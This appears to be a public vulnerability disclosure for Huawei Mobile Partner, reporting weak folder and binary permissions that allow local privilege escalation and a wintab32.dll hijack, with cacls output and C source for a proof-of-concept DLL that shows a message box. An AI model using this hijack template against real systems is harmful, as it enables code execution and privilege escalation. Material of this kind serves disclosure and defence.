# Title: Huawei Mobile Partner Multiple Vulnerabilities # Version: 23.009.05.03.1014 # Tested on: Windows XP SP2 en # Vendor: http://www.huawei.com/ # Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide # E-Mail: osanda[at]unseen.is # Author: Osanda Malith Jayathissa # /!\ Author is not responsible for any damage you cause # Use this material for educational purposes only #1| Local Privilege Escalation -------------------------------- - Description ============== Any user in the system can modify the legitimate binary to any kind of malicious executable. The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and perform DLL hijacking easily. If an attacker break into a low privilege account he could use this application to escalate his privileges. - Proof of Concept =================== C:\Program Files>cacls "Mobile Partner" C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F BUILTIN\Users:(CI)F NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F CREATOR OWNER:(OI)(CI)(IO)(ID)F C:\Program Files>cd "Mobile Partner" C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe" C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F #2| Dll Hijacking Vulnerability (wintab32.dll) ----------------------------------------------- #include BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING); } /*EOF*/